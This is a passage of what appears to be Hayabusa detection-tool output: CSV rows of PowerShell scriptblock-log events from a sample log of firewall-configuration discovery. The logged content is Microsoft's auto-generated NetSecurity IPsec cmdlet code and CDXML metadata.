'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIKEMMCryptoSet"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecMainModeCryptoSet</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""MaxLifetimeMinutes""> <Type PSType=""uint32""/> <RegularQuery> <CmdletParameterMetadata PSName=""MaxMinutes"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""MaxLifetimeSessions""> <Type PSType=""uint32""/> <RegularQuery> <CmdletParameterMetadata PSName=""MaxSessions"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""ForceDiffieHellman""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetMainModeRuleMMCryptoSet"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""MaxLifetimeMinutes""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxMinutes""/> </Parameter> <Parameter ParameterName=""MaxLifetimeSessions""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxSessions""/> </Parameter> <Parameter ParameterName=""ForceDiffieHellman""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""ForceDiffieHellman""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name"" Position=""0"" IsMandatory=""true"" CmdletParameterSets=""ByName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayName"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayName""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""DisplayGroup"" IsMandatory=""true"" CmdletParameterSets=""ByDisplayGroup""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" IsMandatory=""true"" CmdletParameterSets=""ByGroup""/> </RegularQuery> </Property> </QueryableProperties> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Rename"" ConfirmImpact=""Medium""/> <Method MethodName=""Rename""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> <Cmdlet> <CmdletMetadata Verb=""Copy"" ConfirmImpact=""Medium""/> <Method MethodName=""CloneObject""> <ReturnValue> <Type PSType=""System.Int32""/> <CmdletOutputMetadata> <ErrorCode/> </CmdletOutputMetadata> </ReturnValue> <Parameters> <Parameter ParameterName=""NewPolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewPolicyStore""/> </Parameter> <Parameter ParameterName=""NewGPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewGPOSession""/> </Parameter> <Parameter ParameterName=""NewName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewName""/> </Parameter> </Parameters> </Method> </Cmdlet> </InstanceCmdlets> <StaticCmdlets> <Cmdlet> <CmdletMetadata Verb=""New"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:CreateInstance""> <Parameters> <Parameter ParameterName=""cim:OperationOption:PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""PolicyStore""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""GPOSession""/> </Parameter> <Parameter ParameterName=""InstanceID""> <Type PSType=""string""/> <CmdletParameterMetadata Aliases=""ID"" PSName=""Name""/> </Parameter> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""DisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""RuleGroup""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Group""/> </Parameter> <Parameter ParameterName=""Proposals""> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance[]""/> <CmdletParameterMetadata IsMandatory=""true"" PSName=""Proposal""/> </Parameter> <Parameter ParameterName=""MaxLifetimeMinutes""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxMinutes""/> </Parameter> <Parameter ParameterName=""MaxLifetimeSessions""> <Type PSType=""uint32""/> <CmdletParameterMetadata PSName=""MaxSessions""/> </Parameter> <Parameter ParameterName=""ForceDiffieHellman""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""ForceDiffieHellman""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Default""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata PSName=""Default""/> </Parameter> </Parameters> </Method> </Cmdlet> </StaticCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.PrimaryStatus"" UnderlyingType=""uint16""> <Value Name=""Unknown"" Value=""0""/> <Value Name=""OK"" Value=""1""/> <Value Name=""Inactive"" Value=""2""/> <Value Name=""Error"" Value=""3""/> </Enum> <Enum EnumName=""NetSecurity.PolicyStoreType"" UnderlyingType=""uint16""> <Value Name=""None"" Value=""0""/> <Value Name=""Local"" Value=""1""/> <Value Name=""GroupPolicy"" Value=""2""/> <Value Name=""Dynamic"" Value=""3""/> <Value Name=""Generated"" Value=""4""/> <Value Name=""Hardcoded"" Value=""5""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 